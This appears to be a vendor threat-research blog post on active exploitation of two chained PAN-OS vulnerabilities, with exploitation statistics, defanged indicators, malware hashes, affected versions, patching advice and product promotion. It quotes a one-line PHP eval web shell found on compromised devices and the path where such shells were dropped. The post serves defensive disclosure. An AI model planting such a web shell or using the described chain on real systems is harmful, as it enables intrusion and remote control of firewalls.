Wiz observes exploitation in the wild of PAN-OS vulnerabilities

Detect and mitigate CVE-2024-0012 and CVE-2024-9474, PAN-OS vulnerabilities which Wiz Threat Research has observed being exploited in-the-wild. Organizations should patch urgently.

5 minutes read

Palo Alto Networks recently disclosed two critical vulnerabilities affecting PAN-OS that were suspected of being exploited in the wild as 0days, and they later confirmed their active exploitation: the first vulnerability is an authentication bypass (CVE-2024-0012) and the second is a privilege escalation vulnerability (CVE-2024-9474). 

When chained together, these two vulnerabilities allow unauthenticated remote code execution (RCE) on the PAN-OS management interface. An attacker with network access to the interface can exploit CVE-2024-0012 to bypass authentication and then leverage CVE-2024-9474 to escalate privileges, ultimately gaining administrator access and performing arbitrary administrative actions. Exploitation has been observed in the wild by Palo Alto and other organizations tracking this activity since November 17, 2024, and has dramatically increased since the publication of a valid proof-of-concept exploit on November 19th. The ShadowServer Foundation have stated that at least 2,000 instances have been compromised worldwide so far. 

What is CVE-2024-0012? 

CVE-2024-0012 enables attackers to bypass authentication on the PAN-OS management interface, escalate privileges to administrator-level, potentially exploiting related vulnerabilities such as CVE-2024-9474 which provides access to other administrative functions. 

What is CVE-2024-9474? 

CVE-2024-9474 is a privilege escalation vulnerability in Palo Alto Networks PAN-OS software that enables a PAN-OS administrator with access to the management web interface to execute firewall actions with root privileges. It also enables code execution through a simple POST request that creates a PHP session. This vulnerability has been chained with CVE-2024-0012 in observed attacks. 

So far, reported post-exploitation activity includes interactive command execution and deploying malicious payloads like web shells on compromised devices.  

Wiz Research data: what’s the risk to cloud environments?       

Based on Wiz data, 24% of cloud enterprise environments contain virtual PAN-OS devices vulnerable to these CVEs (based on affected version ranges).  
 
Among those vulnerable, 7% of environments contain Internet-facing devices that are exploitable to unauthenticated remote code execution, as validated by our Dynamic Scanner.

What sort of exploitation has been identified in the wild?  

Wiz has observed ongoing exploitation of these vulnerabilities in the wild to compromise virtual PAN-OS devices in cloud environments since November 19th, likely as an immediate result of the public release of a proof-of-concept exploit. In several cases we observed, the threat actors abused their access to deploy web shells, Sliver implants and/or crypto miners. 

Some of the observed activity may also stem from legitimate scans utilizing generic payloads for proof-of-concept purposes, as we have detected what appear to be “dummy” payloads deployed across several devices as a result of exploitation, using seemingly random file names: /var/appweb/htdocs/unauth/{between 4 and 6 random characters}.php. The choice of path might indicate that someone repurposed this exploit which simply writes “watchTowr.php” to the same path. Many of these web shells are very simple and contain the following code with slight variations:  

<?php eval($_POST[1]);?> 

eval($_POST[1]);?> 

In multiple instances, we’ve identified re-use of the same Sliver implant (b4378712adf4c92a9da20c0671a06d53cbd227c8) which uses 77.221.158[.]154 as its C2 address. This IP address has previously resolved the domain censysinspect[.]com, though the domain has since been parked: 

Resolution timeline for censysinspect[.]com as sourced from Validin 

Based on an analysis of related VirusTotal submissions, the same implant can also be found hosted on what appear to be legitimate but compromised web servers running unrelated software, indicating that the threat actor may be running wide scans for vulnerable servers and abusing them for staging purposes. However, we’re unable to confirm if the same threat actor is indeed behind both activities. Furthermore, we believe these activities to be strictly opportunistic, and likely distinct from the 0day exploitation activity reported by Palo Alto. 

censysinspect[.]com itself has previously served as a C2 address for several other Sliver implants, some of which have been hosted on compromised PAN-OS devices as of a few months ago, as indicated by their file-path, global-protect/portal/fonts/Latte-Regular.woff. This could indicate that this particular threat actor has been opportunistically compromising PAN-OS devices using various methods over a period of several months, and has also been using them to stage malware. 

We’ll be updating this blogpost with additional research findings as we continue our investigation. 

The following hashes have been observed by Wiz Threat Research in attacks exploiting CVE-2024-0012:

SHA-1Description
e9cd4829b3e64f2f6f45e2761d474f213009d4c8DaggerFly (Trojan.Linux)
af817679227921768e15a3a5971b263d5fcf6f75DaggerFly (Trojan.Linux)
caae3165bda2e4434f487dee30e39a92e808bfbcDaggerFly (Trojan.Linux)
90f6890fa94b25fbf4d5c49f1ea354a023e06510Specter-C (Botnet)
fca6e83abce58e47e247bee3ebaef3fc4ad89e75PHPWebshell
9a7355565ff9d84e1c61e2174ea1a54358f9628fPHPWebshell
c1dcbf5816f93038313655f1a99f5efc847c637bPHPWebshell
c63f646edfddb4232afa5618e3fac4eee1b4b115XMRig Miner

We also detected new variants of Linux implants attributed to the Daggerfly group. Daggerfly, active for over a decade, has been linked to new variants of Linux implants. This group has targeted individuals, government agencies, NGOs, and telecoms across Asia and Africa. Daggerfly is known for exclusively using MgBot malware and has likely been involved in multiple supply chain infection campaigns. The implant functions as a backdoor, embedding itself in key system binaries and services, including crond, sshd and netstat. While no additional activity from the group has been detected beyond the backdoor installation, we will provide updates as new information emerges.

Which products are affected? 

The following products are affected by CVE-2024-0012. In addition to these versions, PAN-OS versions before 10.1.14-h6 are impacted by CVE-2024-9474. 

VersionAffected
PAN-OS 11.2< 11.2.4-h1
PAN-OS 11.1< 11.1.5-h1
PAN-OS 11.0< 11.0.6-h1
PAN-OS 10.2< 10.2.12-h2

Which actions should security teams take? 

It is recommended to upgrade to the latest version of PAN-OS that includes a patch for these vulnerabilities. The upgrade should be performed according to the official guidance provided by Palo Alto Networks in their advisories. Additionally, customers should secure access to the management interface by restricting access only to trusted IP addresses, reducing the attack surface and the likelihood of exploitation while ensuring no malicious exploitation has been already utilized on the device.  

How Wiz can help 

The Wiz Threat Intelligence Center was updated on November 10th (9 days before a public proof-of-concept exploit emerged) to warn our customers of suspected exploitation of a 0day vulnerability affecting PAN-OS devices as soon as initial information became available, and we’ve been continuously updating our customer advisory since then with the latest information about these vulnerabilities, most notably when the vulnerabilities were confirmed by Palo Alto and the public proof-of-concept exploit was published. 

Wiz customers can use the pre-built queries and advisory in the Wiz Threat Intelligence Center to search for vulnerable or compromised instances of PAN-OS in their environment. 

Wiz detects vulnerable and/or infected PAN-OS devices through a combination of agentless scanning of our customers’ cloud environments and active unauthenticated scanning using the Wiz Dynamic Scanner, based on this Nuclei template originally published by watchTowr.  We can confirm that this template accurately detects vulnerable instances without executing code on the target resource.  

What’s special about Wiz response ability to high-profile threats 

At Wiz, we’ve built a platform uniquely equipped to respond to high-profile threats to cloud environments with unmatched agility and depth.  

By integrating disk-level insights, external exploitation validation, and compromised machines with malware detection, Wiz provides full visibility across the lifecycle of exploitation and risk identification – all without the use of agents. 

When new threats emerge, Wiz helps you: 

  • Identify vulnerable software versions in your environment, with additional runtime context using the Wiz Sensor. 

  • Validate actual exploitability from the outside and prioritize risks effectively, based on the context of affected resources such as high privileges or sensitive data access. 

  • Gain visibility into instances that were already targeted and compromised by threat actors. 

This unique approach gives you full transparency and control, so you can stay ahead of attackers and protect what matters most to your business.   

References 

Continue reading

Get a personalized demo

Ready to see Wiz in action?

“Best User Experience I have ever seen, provides full visibility to cloud workloads.”
David EstlickCISO
“Wiz provides a single pane of glass to see what is going on in our cloud environments.”
Adam FletcherChief Security Officer
“We know that if Wiz identifies something as critical, it actually is.”
Greg PoniatowskiHead of Threat and Vulnerability Management